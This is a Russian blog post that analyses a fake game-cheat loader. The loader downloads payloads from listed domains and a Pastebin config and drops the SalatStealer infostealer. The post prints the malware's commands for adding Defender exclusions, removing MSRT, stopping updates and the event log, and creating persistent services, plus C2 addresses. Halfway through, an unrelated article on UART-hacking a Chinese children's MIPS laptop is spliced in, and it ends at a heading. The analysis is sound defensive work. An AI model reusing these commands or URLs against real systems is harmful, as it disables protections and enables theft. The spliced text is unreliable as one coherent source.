или рассказ о том, что можно получить вместо читов.

Наткнулся на ролик, весьма свежий и решил посмотреть, что нам предлагают.

Приходим в телеграмм канал и видим от 7го ноября:

О чем это нам говорит?  А о том, что файл хорошо сживается, и что его кто-то специально раздул до таких больших размеров. Цель тут одна – затруднить отправку файла  в различные онлайн сервисы по исследованию программ. Ок, давайте это проверим.  Загрузим в ExeInfo  и видим наличие оверлея (доп информация в файле). Просто вырежи его в отдельный файл.

Хорошо, посмотрим что этот файл делает, откроем  его в дизассемблере и перейдём в главную функцию, которая исполняется при запуске.

P.S. Кто-нибудь знает что такое nero_preloader? Ответьте в коментариях.

Вот оно! Скачивается файл  по определённому адресу: http://uffyaa[.]ru/PacketgeoDbbaseFlowerDatalifeLocalpublicDownloads/da5911c60d39ce73116584ec5e0325f503780e55693c9952e76cab1c0441652055d0bd67ed27bb89,  копируется в :\\ProgramData\\sessionuserhost.exe и запускается.  На этом функционал этого  исполняемого файла закончен, но это же нас не остановит? Скачаем и продолжим исследование дальше.

На этот раз скачался исполняемый файл весом в 400 кБ, назовём его test.exe и продолжим

Основные действия функции

1. Получение системных путей:

   • Получает путь к системной директории Windows с помощью GetSystemWindowsDirectoryA

   • Формирует пути к различным системным и программным директориям

2. Создание вредоносных файлов и сервисов:

   • Создает файл sessionuserhost.exe в ProgramData

   • Создает задание в планировщике задач (schtasks /create) для автоматического запуска этого файла при входе в систему

   • Создает сервис с именем InputService через sc create

3. Отключение системных защитных механизмов:

   • Отключает Windows Recovery (reagentc /disable)

   • Удаляет теневые копии томов (vssadmin delete shadows)

   • Добавляет исключение в защитник Windows через PowerShell (Add-MpPreference -ExclusionPath)

4. Подмена системных файлов:

   • Работает с файлом hosts (\\Windows\\System32\\drivers\\etc\\hosts)

   • Вмешивается в системные файлы в директории Recovery

5. Маскировка под легитимные процессы:

   • Создает файлы с именами, похожими на легитимные процессы:

     • steamuiupdater.exe

     • EpicOnlineServicesUpdater.exe

     • G HUB tray.exe

     • Riot Client Updater.exe

     • MSIAfterburnerServiceMonitorTray.exe

     • NVIDIA app tray.exe

     • twain_32.exe

     • system auditor.exe

     • EpicOnlineServicesInstalator.exe

6. Выполнение команд с повышенными привилегиями:

   • Использует ShellExecuteA с параметром "runas" для выполнения команд от имени администратора

   • Выполняет несколько вредоносных команд через cmd.exe

Продолжаем  исследовать дальше, видим обращение к некоторому адресу https://pastebin[.]com/raw/qQe7Aa7D

от кроем его, что же мы видим:

Дальше часть кода процедуры из test.exe:

И так, основные функции данного файла и Основная цель функции:

Попытаться скачать файл config.json с ресурса https://pastebin.com/raw/qQe7Aa7D и, если это не удалось, выполнить резервную загрузку дополнительных данных (3 имполняемые файла) с нескольких подозрительных доменов (в частности, uffyaa.ru).

Инициализация переменных и строк:

• Выделяется память под строку URL: https://pastebin.com/raw/qQe7Aa7D.

• Из второго аргумента (a2) извлекаются указатели и длина строки (путь к директории), к которому дописывается :\\ProgramData\\config.json.

Формируется целевой путь к файлу:

• Собирается строка пути, куда должен быть сохранён файл: например, C:\ProgramData\config.json.

Попытка загрузки файла с Pastebin:

• Используется URLDownloadToFileA, чтобы скачать файл по указанному URL и сохранить в подготовленном пути.

• Если загрузка прошла успешно, функция завершает работу, иначе переходит к резервной логике.

Резервная логика загрузки (fallback):

• Если основной файл не загружен, вызывается функция download01 с различными параметрами (ключи: "count", "type", "link0", "link1", "link2").

• Эти ключи соответствуют различным частям конфигурации или файлов:

  • "type": ".exe" — ожидается исполняемый файл.

  • "link0", "link1", "link2" — это прямые ссылки на вредоносные загрузки с сервера uffyaa.ru, каждая ведёт к конкретному зашифрованному или закодированному payload.

Заключение:

Функция реализует двухэтапную схему получения вредоносной конфигурации:

1. Сначала пытается скачать конфиг с Pastebin.

2. Если не удалось — переходит к запасным URL, каждый из которых может представлять отдельную угрозу (исполняемые файлы, настройки, ключи и т.д.).

Продолжим наше исследование и скачаем содержание этих 3-х ссылок:

http://[virus].ru/PacketgeoDbbaseFlowerDatalifeLocalpublicDownloads/6adc1e14c896571371bc6e1c4f7763c7dd67d22af827cc0b57c4bde8e8925ba6f4120c2f803e7acc

http://[virus].ru/PacketgeoDbbaseFlowerDatalifeLocalpublicDownloads/6adc1e14c896571371bc6e1c4f7763c7dd67d22a0fa376726207bab855d42dfae89552cc17559ca3

http://[virus].ru/PacketgeoDbbaseFlowerDatalifeLocalpublicDownloads/9a094aaf722f08d3740be907a66838ad10afc6b865efdfd57fdb96d631878268f5775ef930869653

Файл file1.ex_ :

Приводить участки кода не буду, но вот  список того что она делает:

1. C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process '"C:\Users\admin\Desktop\file1.exe"' -Verb runAs

2. C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

3. C:\WINDOWS\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

4. wusa  /uninstall /kb:890830 /quiet /norestart

5. C:\WINDOWS\system32\sc.exe stop UsoSvc

6. C:\WINDOWS\system32\sc.exe stop wuauserv

7. C:\WINDOWS\system32\sc.exe stop bits

8. C:\WINDOWS\system32\sc.exe stop dosvc

9. C:\WINDOWS\system32\powercfg.exe /x -hibernate-timeout-dc 0

10. C:\WINDOWS\system32\powercfg.exe /x -standby-timeout-ac 0

11. C:\WINDOWS\system32\powercfg.exe /x -standby-timeout-dc 0

12. Создает C:\WINDOWS\system32\dialer.exe

13. C:\WINDOWS\system32\sc.exe delete "EJJYGAKZ"

14. C:\WINDOWS\system32\sc.exe create "EJJYGAKZ" binpath= "C:\ProgramData\jtixikfvpels\lxwvsyozcpiw.exe" start= "auto"

15. C:\WINDOWS\system32\sc.exe stop eventlog

16. C:\WINDOWS\system32\sc.exe start "EJJYGAKZ"

17. "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.EXE" "тут обфусцированный скрипт"

18. C:\WINDOWS\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

19. wusa  /uninstall /kb:890830 /quiet /norestart

20. C:\WINDOWS\system32\sc.exe stop UsoSvc

21. C:\WINDOWS\system32\sc.exe stop WaaSMedicSvc

22. C:\WINDOWS\system32\sc.exe stop wuauserv

23. C:\WINDOWS\system32\sc.exe stop bits

24. C:\WINDOWS\system32\sc.exe stop dosvc

25. C:\WINDOWS\system32\powercfg.exe /x -hibernate-timeout-ac 0

26. C:\WINDOWS\system32\powercfg.exe /x -hibernate-timeout-dc 0

27. C:\WINDOWS\system32\powercfg.exe /x -standby-timeout-ac 0

28. C:\WINDOWS\system32\powercfg.exe /x -standby-timeout-dc 0

29. Запуск C:\WINDOWS\system32\dialer.exe

30. C:\Windows\System32\dllhost.exe /Processid:{7cfb6527-f523-4e75-b050-9073d7bf3e84}

31. "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.EXE" " тут обфусцированный скрипт "

32. C:\Windows\System32\dllhost.exe /Processid:{7097c13c-ab69-4ab9-941c-0a3ff141828d}

33. C:\WINDOWS\System32\slui.exe -Embedding

А теперь тоже самое, с расшифровкой:

1. Запускается file1.exe с повышенными правами (администратор), что критично для выполнения всех следующих действий.

2. Копирует .exe файлы в каталоги %UserProfile% и %ProgramData%. Это позволяет запускать и сохранять вредоносный код без обнаружения.

3–4, 18–19. Удаление обновления Windows KB890830

wusa /uninstall /kb:890830 /quiet /norestart

KB890830 — это средство удаления вредоносных программ (MSRT).

Злоумышленник удаляет его, чтобы оно не удалило вредоносное ПО.

5–8, 20–24. Отключение обновлений и службы передачи данных

sc stop UsoSvc

sc stop wuauserv

sc stop bits

sc stop dosvc

*  Отключение служб:

• Центра обновления Windows (wuauserv)

• Интеллектуальной передачи данных в фоне (BITS)

• Обновления операционной системы (UsoSvc, WaaSMedicSvc, dosvc)

*  Цель: остановить обновления и вмешательство Microsoft.

9–11, 25–28. Отключение автоматического сна и гибернации

powercfg.exe /x ...

*  Модифицирует схемы питания:

• Устанавливает таймауты гибернации и сна в 0.

*  Цель: предотвратить переход ПК в спящий режим, чтобы вредоносный код работал непрерывно

12. Создание dialer.exe в system32

  Необычное место и имя.

13–16. Создание и запуск вредоносной службы

sc delete "EJJYGAKZ"

sc create "EJJYGAKZ" binpath= "..." start= "auto"

sc stop eventlog

sc start "EJJYGAKZ"

Удаляется старая служба, создаётся новая с автостартом.

• Программа lxwvsyozcpiw.exe будет запускаться при загрузке.

• Остановка eventlog — попытка скрыть следы в журнале событий.

  
  

17, 31. Выполнение сложного PowerShell-скрипта с динамической загрузкой и внедрением

• Скрипт создает динамический делегат, используя Reflection.Emit.

• Получает доступ к системным сборкам и вызывает низкоуровневые функции.

• Используется Marshal::GetDelegateForFunctionPointer, Copy, Invoke и т.п.

• Это указывает на:

  • Создание и внедрение shell-кода

  • Вызов функций из сторонних DLL

  • Динамическую декриптацию или загрузку полезной нагрузки

• Также возможно, что выполняется DLL-сидeloading или внедрение в dllhost.exe.

30. Запуск DLLHost с нестандартным идентификатором COM

*  Вероятно, загрузка вредоносной DLL через COM-объект.

*  Используется для маскировки и уклонения от обнаружения.

29. Запуск dialer.exe

• Ранее созданный исполняемый файл.

• Основной вредоносный компонент.

Итоговая цель вредоносной программы

• Получить полный контроль над системой

• Отключить защиту и обновления

• Скрыть активность

• Закрепиться через автозапуск

• Выполнить вредоносную нагрузку (включая DLL sideloading, shellcode, системные вызовы)

• Возможное дальнейшее заражение или шпионаж

Как вы могли заметить, выполнились 2 PowerShell  скрипта,  после их расшифровки мы можем понять, что делает эта программа. Вот подробное описание, что делает эта вредоносная программа на основе всех 31 шага:

🔧 1. Запуск вредоносного исполняемого файла с правами администратора

powershell.exe Start-Process '"C:\Users\admin\Desktop\file1.exe"' -Verb runAs

Запускает исполняемый файл с повышенными правами (UAC bypass).

🛡️ 2. Отключение антивирусной защиты Windows Defender

powershell  Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

Добавляет в исключения директории и расширение .exe, чтобы антивирус игнорировал любые EXE-файлы, особенно в папках пользователя и ProgramData.

🧹 3, 4, 18, 19. Удаление инструмента для очистки вредоносных программ

cmd  wusa /uninstall /kb:890830 /quiet /norestart

Удаляет KB890830 — это Microsoft Windows Malicious Software Removal Tool (MSRT). Деактивирует его, чтобы он не удалил вредоносный код.

⚙️ 5–8, 20–24. Отключение сервисов обновлений и фоновых служб

cmd sc.exe stop UsoSvc, wuauserv, bits, dosvc, WaaSMedicSvc

Выключает службы:

• UsoSvc — обновления Windows

• wuauserv — агент обновлений

• bits — фоновая загрузка

• dosvc — оркестратор доставки

• WaaSMedicSvc — сервис восстановления обновлений

📛 Цель — остановить обновления и автоматическое восстановление системных компонентов, чтобы система не восстановилась после заражения.

🔌 9–11, 25–28. Изменение параметров электропитания

cmd  powercfg.exe /x -standby-timeout-ac 0, /x -hibernate-timeout-dc 0 и т.п.

Отключает ожидание и гибернацию, чтобы система постоянно работала и не уходила в спящий режим. Это может быть нужно для непрерывной работы вредоносного кода.

⚠️ 12. Создание вредоносного dialer.exe

Создаёт файл C:\WINDOWS\system32\dialer.exe. Вероятно, это вредоносный компонент.

🧪 13–16. Удаление, создание и запуск скрытого сервиса

cmd sc.exe delete "EJJYGAKZ"

cmd sc.exe create "EJJYGAKZ" binpath= "C:\ProgramData\jtixikfvpels\lxwvsyozcpiw.exe" start= "auto"

cmd sc.exe start "EJJYGAKZ"

Удаляет старый сервис и создаёт новый с произвольным именем, который указывает на вредоносный EXE в ProgramData. Сервис будет запускаться автоматически при старте системы.

🚨 15. Остановка системного журнала событий

cmd  sc.exe stop eventlog

Отключает логирование событий. Это мешает расследованию и скрывает следы.

🧬 17. Динамическая генерация вредоносного .NET-кода в PowerShell

Большой PowerShell-скрипт:

• Создаёт в памяти сборку .NET.

• Динамически компилирует делегаты (обработчики функций).

• Использует GetProcAddress для доступа к WinAPI-функциям.

• Патчит память (в том числе — делает VirtualProtect).

• Загружает DLL (в том числе из SOFTWARE\dialerstager в реестре).

• Возможно, загружает вторичный пейлоад или обходит защиту.

📌 Это обфусцированный загрузчик или инжектор, работающий полностью в памяти. Очень продвинутый подход.

☎️ 29. Запуск созданного dialer.exe

Продолжает выполнение уже подготовленного вредоносного компонента.

🧪 30. Запуск COM-хоста (dllhost.exe) с уникальным идентификатором CLSID

cmd  dllhost.exe /Processid:{...}

Может использоваться для запуска COM-объекта — часто применяется для инжекции или маскировки кода, запускаемого через системные службы.

🧬 31. Ещё один PowerShell с генерацией и вызовом делегатов

Похож на шаг 17. Второй PowerShell-скрипт делает то же самое:

• Создаёт в памяти типы.

• Патчит системные функции.

• Загружает вредоносные модули.

🧠 Итоговая картина

Программа:

1. Запускает вредоносный EXE от имени администратора.

2. Обходит Windows Defender.

3. Удаляет средства защиты от вредоносного ПО.

4. Отключает службы обновлений и логирования.

5. Меняет параметры питания.

6. Устанавливает и запускает вредоносные сервисы.

7. Генерирует .NET-код прямо в памяти (fileless-инжекция).

8. Загружает скрытые DLL или shellcode.

9. Осуществляет запуск и маскировку через dialer.exe и dllhost.exe.

Что же делает File2.exe?

1. C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process '"C:\Users\admin\Desktop\file2.exe"' -Verb runAs

2. C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

3. C:\WINDOWS\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

4. wusa  /uninstall /kb:890830 /quiet /norestart

5. C:\WINDOWS\system32\sc.exe stop UsoSvc

6. C:\WINDOWS\system32\sc.exe stop WaaSMedicSvc

7. C:\WINDOWS\system32\sc.exe stop wuauserv

8. C:\WINDOWS\system32\sc.exe stop bits 

9. C:\WINDOWS\system32\powercfg.exe /x -hibernate-timeout-ac 0“

10. C:\WINDOWS\system32\powercfg.exe /x -hibernate-timeout-dc 0

11. C:\WINDOWS\system32\powercfg.exe /x -standby-timeout-ac 0

12. C:\WINDOWS\system32\powercfg.exe /x -standby-timeout-dc 0

13. start  C:\WINDOWS\system32\dialer.exe

14. C:\WINDOWS\system32\sc.exe delete "WLJNDOJC"

15. C:\WINDOWS\system32\sc.exe create "WLJNDOJC" binpath= "C:\ProgramData\zrntznqzxmws\ydmehmmzlokc.exe" start= "auto"

16. C:\WINDOWS\system32\sc.exe stop eventlog

17. C:\WINDOWS\system32\sc.exe start "WLJNDOJC"

18. C:\WINDOWS\system32\SppExtComObj.exe -Embedding

19. "C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent

20. "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.EXE" "function ....."

21. start C:\ProgramData\zrntznqzxmws\ydmehmmzlokc.exe

22. C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

23. C:\WINDOWS\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

24. wusa  /uninstall /kb:890830 /quiet /norestart

25. C:\WINDOWS\system32\sc.exe stop UsoSvc

26. C:\WINDOWS\system32\sc.exe stop WaaSMedicSvc

27. C:\WINDOWS\system32\sc.exe stop bits

28. C:\WINDOWS\system32\sc.exe stop dosvc

29. C:\WINDOWS\system32\powercfg.exe /x -hibernate-timeout-dc 0

30. C:\WINDOWS\system32\powercfg.exe /x -standby-timeout-ac 0

31. C:\WINDOWS\system32\powercfg.exe /x -standby-timeout-dc 0

32. C:\Windows\System32\dllhost.exe /Processid:{0995f9a4-ba6d-4140-a15e-2b171752e608}  (Application was injected by another process)

33. "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.EXE" "function ............."

34. C:\Windows\System32\dllhost.exe /Processid:{3a3997b4-63b2-4a14-adf7-fc6a4d4fb2c3}  (Application was injected by another process)

🟨 Общие элементы

Обе программы:

• Активно используют PowerShell и reg add.

• Модифицируют службы и параметры Defender.

• Пытаются внедрить исключения в систему защиты.

• Используют техники персистентности (запуск по расписанию, скрытые скрипты).

File3.exe:

Этот фaл  отличается от других  упакован модифицированным UPX. Эта программа уже написана на Go(go1.22.0)  но зато активно общается  с 188.114.96.3, 172.67.191.102:433 и с другими

Видимо это и есть сам вредонос для удалённого доступ к компьютеру жертвы.  Позже я расскажу что же это такое. Обезопасим себя на всякий случай. Вот готовый .bat-файл, который создаст правила в брандмауэре Windows для блокировки IP-адреса 172.211.123.249:

а это и есть SalatStealer, знакомитесь:

• SalatStealer — это тип вредоносного ПО, предназначенный для кражи данных с заражённых устройств.

• Он разработан на языке Golang и может выполнять различные действия, включая создание скриншотов и эксфильтрацию файлов.

• Использование SalatStealer может привести к серьёзным последствиям, таким как кража личной информации.

Конектится к:

https://sa1at[.]ru/sa1at/

https://sa1at[.]ru/sa1at/jcl2eeqx

Сайт sa1at[.]ru был идентифицирован как вредоносный и используется в качестве центра управления (C2) для вредоносного ПО под названием Salat Stealer. По данным ThreatFox, этот домен классифицируется как связанный с ботнетом и имеет высокий уровень достоверности угрозы (100%) .

Рекомендую  добавить sa1at[.]ru в файл hosts для блокировки доступа:

SalatStealer — это вредоносное программное обеспечение, классифицируемое как инфостилер, разработанное на языке Go. Оно предназначено для кражи конфиденциальных данных с заражённых систем.

🧬 Основные характеристики

• Язык разработки: Go (Golang)

• Методы упаковки: Использует UPX (Ultimate Packer for eXecutables) для упаковки исполняемых файлов, что затрудняет анализ и обнаружение.

• Основные функции:

  • Сбор системной информации: данные о жёстком диске, разрешение экрана, активные процессы и окна.

  • Кража учётных данных из браузеров (Chrome, Firefox, Edge) и почтовых клиентов.

  • Доступ к криптовалютным кошелькам и кража приватных ключей.

  • Поиск незашифрованных паролей в текстовых файлах.

  • Эксплуатация микрофона и камеры для записи аудио и видео, а также возможность трансляции экрана в реальном времени

Salat Stealer — это скрытное вредоносное ПО, разработанное на языке программирования Go, предназначенное для проникновения в системы и извлечения конфиденциальных данных. После заражения устройства оно собирает обширную системную информацию, такую как сведения о жёстком диске, разрешение экрана, запущенные процессы и активные окна. Одной из его наиболее тревожных особенностей является его способность транслировать рабочий стол жертвы в режиме реального времени и захватывать аудио и видео с помощью микрофона и камеры устройства, что создаёт серьёзные проблемы с конфиденциальностью. Кроме того, Salat Stealer способен извлекать файлы из скомпрометированной машины. Его присутствие может привести к значительным рискам, включая кражу личных данных, финансовые потери и серьёзные нарушения конфиденциальности.

Возможности и функциональность

Кража данных и сбор учётных данных
• Собирает сохранённые учётные данные из веб-браузеров (например, Chrome, Firefox, Edge).
• Извлекает учётные данные для входа из локальных почтовых клиентов.
• Получает доступ к файлам криптовалютного кошелька для кражи закрытых ключей или средств.
• Ищет незащищённые учётные данные, хранящиеся в текстовых файлах.
• Извлекает файлы из скомпрометированной системы, что может привести к серьёзным нарушениям конфиденциальности, финансовым потерям и краже личных данных.

Мониторинг рабочего стола в реальном времени
• Обладает возможностями потоковой трансляции, что позволяет злоумышленникам отслеживать активность на рабочем столе жертвы в режиме реального времени.
• Может записывать аудио и видео через микрофон и камеру устройства, что создаёт серьёзные риски для конфиденциальности.

Методы сохранения и уклонения
• Записывает файлы в критические системные каталоги (Windows, System32, Drivers, Program Files)
• Изменяет реестр Windows (ключ Run), чтобы обеспечить автоматическое выполнение при запуске.
• Использует методы обхода контроля учетных записей (UAC) для повышения привилегий.
• Выполняет сброшенные полезные нагрузки для расширения цепочки атак.
• Использует упаковку UPX для сокрытия своего кода и обхода обнаружения на основе сигнатур.

Обзор цепочки атак

1. Первичное заражение:

   • Распространяется через фишинговые письма, вредоносные вложения и скрытые загрузки.

   • Также может распространяться через взломанное программное обеспечение или троянизированные приложения.

2. Исполнение и настойчивость:

   • Вредоносная программа запускается при взаимодействии с пользователем, например, при открытии вредоносного файла.

   • Для достижения устойчивости он использует реестр Windows (ключ «Выполнить»).

   • Попытки обойти контроль учетных записей (UAC) для получения повышенных привилегий.

3. Системная разведка и сбор данных:

   • Перечисляет запущенные процессы и активные окна.

   • Сканирует сохраненные учетные данные в веб-браузерах, почтовых клиентах и криптовалютных кошельках.

   • Проверяет языковые настройки системы, чтобы потенциально избежать заражения определенных регионов.

4. Утечка данных:

   • Извлеченные учетные данные и сведения о системе отправляются на контролируемый злоумышленником сервер управления и контроля (C2).

   • Вредоносная программа может попытаться удалить следы своей активности, чтобы избежать обнаружения.

Обход контроля учетных записей пользователей (UAC)

SalatStealer использует обходные методы контроля учетных записей (UAC) для получения повышенных привилегий без оповещения пользователя. Устанавливая ключ EnableLUA в \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA на «0» (отключает UAC).

При установке EnableLUA на 0 вредоносная программа отключает принудительное применение UAC, что позволяет ей выполнять административные команды и сохранять устойчивость, обходя ограничения безопасности. Однако это изменение вступает в силу не сразу — для полного отключения UAC требуется перезагрузка системы. Пока система не перезагрузится, запрос UAC будет по-прежнему отображаться при запуске вредоносной программы.

Механизм устойчивости SalatStealer

SalatStealer обеспечивает постоянство, копируя себя в случайные каталоги. В моем случае он скопировал себя в:

• C:\Program Files (x86)\Защитник Windows\

• C:\Program Files (x86)\Windows NT\

Затем он создает ключи запуска в реестре Windows, чтобы обеспечить выполнение при запуске:

\REGISTRY\USER\<USER_SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = «C:\\Program Files (x86)\\Windows Defender\\smss.exe»

\REGISTRY\USER\<USER_SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = «C:\\Program Files (x86)\\Windows NT\\dllhost.exe»

Мониторинг экрана и рабочего стола в реальном времени

Salat Stealer может непрерывно делать снимки экрана и даже транслировать содержимое рабочего стола жертвы на командный сервер (C2) злоумышленника, обеспечивая наблюдение за его действиями в режиме реального времени.

Кража данных буфера обмена

Salat активно отслеживает активность буфера обмена, что позволяет ему перехватывать скопированный текст, включая пароли, адреса криптовалют и другие конфиденциальные данные.

Кейлоггерство – перехват нажатия клавиш

Salat Stealer записывает все, что вводится в систему жертвы, фиксируя учетные данные, сообщения и любые другие вводимые данные в режиме реального времени.

Аудио- и видеошпионаж

Salat Stealer функционирует как полноценный шпионский инструмент, способный:

Запись микрофона: захват и передача звука с микрофона жертвы.
Доступ к веб-камере: запись видео с веб-камеры системы.
Прямая трансляция: трансляция аудио- и видеопотоков в реальном времени на удалённый сервер злоумышленника.

Эксфильтрация

Salat Stealer использует скрытый процесс эксфильтрации для передачи украденных данных на свой сервер C2, используя шифрование AES для сокрытия конфиденциальной информации перед передачей. Файлы упакованы в архивы ZIP

Заключение

SalatStealer — это скрытное и устойчивое вредоносное ПО, предназначенное для кражи конфиденциальных данных, избегая обнаружения. Собирая учетные данные, изымая файлы и обеспечивая наблюдение в реальном времени, оно представляет серьезные риски для жертв, включая финансовые потери, кражу личных данных и нарушения конфиденциальности. Оно использует обход UAC и изменения реестра, что затрудняет удаление. Кроме того, его механизмы шифрования и упаковка UPX еще больше усложняют анализ и обнаружение. Учитывая его широкую направленность на веб-браузеры, криптовалютные кошельки и приложения для обмена сообщениями, SalatStealer остаётся значительной угрозой, подчёркивая необходимость постоянного мониторинга и расширенных мер безопасности для противодействия его воздействию.

Осторожно: в статье я постарался подробно и простым языком написать об аппаратном моддинге и ковыряние в железе, хакинге Linux и обходе проприетарной оболочки, а также программировании и портировании софта с других платформ. Но есть нюанс...

Я очень большой фанат портативных гаджетов с полноценными QWERTY-клавиатурами: ноутбуков, коммуникаторов и различных хэндхелдов. Когда в мои руки попадает девайс с Linux или Windows CE в том или ином виде, я стараюсь максимально расширить функционал устройства и порой даже портирую программы с других платформ! Недавно мне удалось купить китайский детский обучающий ноутбук с MIPS-процессором и поворотным дисплеем всего за 1 000 рублей. Интересно узнать о том, как я хакнул девайс и причём здесь Dingoo A320? Тогда жду вас под катом!

❯ Предыстория

В конце 2000-х годов, цена на бюджетные ноутбуки снизилась настолько, что купить полноценный лэптоп мог почти каждый студент. Если в начале нулевых годов миниатюрность была роскошью и стоила довольно дорого по отношению к обычным 15-дюймовым бюджетникам, то с выходом Asus EEEPC в 2007 году, маленькие нетбуки с 7-дюймовыми дисплеями наоборот образовали новый сегмент рынка недорогих портативных устройств.

Сейчас мы с вами привыкли, что большинство ноутбуков работает на базе процессоров с двумя архитектурами — x86_64 и ARM. Однако в те времена, инженеры и производители активно экспериментировали и с альтернативными архитектурами — например, MIPS. В 2009 году, некая китайская компания Noah Educational Holdings, которая занималась разработкой портативных устройств для обучения дошколят и школьников младших классов, выпустила на рынок свой собственный миниатюрный обучающий ноутбук — Noah NP5000.

Обычно, когда читатель слышит «детский ноутбук», он представляет себе небольшое устройство с почти полноценной QWERTY-клавиатурой, небольшим монохромным ЖК-дисплеем и набором некоторых обучающих программ. При этом замоддить такие устройства не представляется возможным — в них используются микроконтроллеры с масочной ROM (прожигаемой на заводе), которые скорее всего являются близкими родственниками процессоров тех самых Тетрисов!

Однако в случае с NP5000 всё было совершенно по другому — дисплей здесь уже цветной, а не монохромный, вместо батареек используется полноценный аккумулятор, да и в целом девайс выглядит действительно как взрослый миниатюрный нетбук с поворотным экраном! При включении пользователя встречает заставка с логотипом компании и характерным пингвинчиком, рабочий стол, напоминающий Windows XP и определенный набор обучающих программ на китайском языке.

В один день я листал Goofish (китайский аналог Авито) в поисках интересных гаджетов, именно пингвинчик и привлёк моё внимание. Информации о том, на каком процессоре работает ноутбук, можно ли на него устанавливать сторонние приложения и что он вообще умеет в сети не было. Однако приятная цена в 1 000 рублей и желание заполучить интересный девайс в коллекцию взяли верх — и я решил рискнуть!

Когда девайс приехал ко мне, я немного поковырял его родную оболочку, попытался выйти в терминал, поставить пакеты OpenWRT — но всё тщетно, оболочка тщательно была закрыта от ушлых детских ручек! Поэтому я решил разобрать девайс и узнать, на каком процессоре он работает и есть ли у нас UART, на котором можно поискать рут-консоль или хотя-бы консоль U-Boot.

Девайс помог привезти в Россию мой подписчик Роман и сервис YouCanBuy, за что им огромное спасибо! Также этой статьи не было бы без подписчика Андрея, который занял мне определенную сумму для заказа ништячков из Китая, за что ему отдельная благодарность!

❯ Что внутри?

Разбирается маленький нетбук почти также, как и его взрослые собратья — через клавиатуру! Со стороны поддона виднеется съёмная крышка, которая на x86-устройстве должна содержать в себе место под HDD и слоты для оперативной памяти. Однако в нашем случае, здесь скрывается кое-что поинтереснее: видите характерное место под миниджек с подписанными пинами RX и TX? Это и есть UART, о котором я говорил в прошлом абзаце.

Плата ноутбука выделяется низкой плотностью монтажа и отсутствием какого либо охлаждения. Процессор, оперативная память и флэшка скрыты под большим защитным экраном на винтиках, в то время как дополнительные модули скрываются под экранами, которые припаяны к плате.

В качестве процессора используется легендарный Ingenic JZ4757! Это готовая система на кристалле, включающая в себя MIPS-ядро собственной разработки с микроархитектурой XBurst, работающее на частоте до 380МГц, видеоконтроллер с возможностью вывода картинки на дисплей или телевизор, аудиокодек, USB-хост и т. п. Слева от процессора расположились два чипа ОЗУ типа SDRAM, в сумме образующие 64Мб, а чуть ниже распаяна NAND-флэшка от компании Samsung на 2Гб. Справа снизу «спрятался» чип часов реального времени — с которого при желании можно было бы взять шину I2C!

Я не зря назвал процессоры от Ingenic легендарными. Дело в том что именно JZ'шки использовались во многих легендарных портативных гаджетах нулевых годов. Например, JZ4732 использовался в популярной эмуляторной игровой консоли Dingoo A320, а JZ4725 использовался в журнале Vogue с экранчиком и OpenHardware-ноутбуке Ben NanoNote. Ingenic славились своей открытостью к сообществу моддеров и свободно предоставляла исходный код ядра Linux, BSP для Windows CE и даже код своей проприетарной прошивки для MP4-плееров!

Далее я решил подпаяться к UART'у, дабы почитать что у нас туда пишет система. Вне зависимости от чипсета или устройства, довольно часто на UART летят логи загрузчика и ядра, а иногда на нём можно найти и рутовую консоль. Благодаря такому «бэкдору» можно попытаться хакнуть самые разные устройства: например, тонкие клиенты на процессорах Marvell или незамысловатый ТВ-бокс. В качестве USB-UART преобразователя я использую плату с ESP32 с постоянным RESET'ом на микроконтроллере (дабы не вмешивался в работу шины):

❯ Хакаем

Далее я включил ноутбук, настроил Putty на свой COM-порт с бодрейтом 115200 и увидел логи. Выяснилось что в качестве загрузчика используется всеми любимый U-Boot (в котором нельзя прервать процесс загрузки), а в качестве ядра — Linux версии аж 2.6! И конечно же на этом терминале висела полноценная рут-консоль!

Далее я сразу решил проверить с какой системой мне придется иметь дело: заглянул в top, обнаружив что используется оболочка Qtopia (формальная альтернатива Xorg и DirectFB для КПК на Linux), пошерстил по папкам с бинарниками и посмотрел inittab. Наша задача — заставить ноутбук запускаться с текстовым терминалом на дисплее, а Qtopia запускать уже по желанию.

Сначала я закомментировал запуск Qtopia в скрипте автозагрузки - inittab'е. Однако если просто «прибить» оболочку — после включения ноутбука нас будет встречать пустой экран без какого либо взаимодействия. Поскольку у меня не было возможности изменить cmdline ядра и перенаправить консоль на терминал fbcon, я решил это сделать уже в юзерспейсе с помощью системного вызова TIOCCONS, однако он по каким-то причинам выдавал ошибку. Тогда пришлось немного костылить и дублировать терминал с помощью getty:

После этого у меня начал нормально работать терминал! Правда, без скроллинга... пока не знаю почему. Теперь, когда у нас есть рутовая консоль и полноценный busybox, можно немного поэкспериментировать!

❯ Портируем эмуляторы

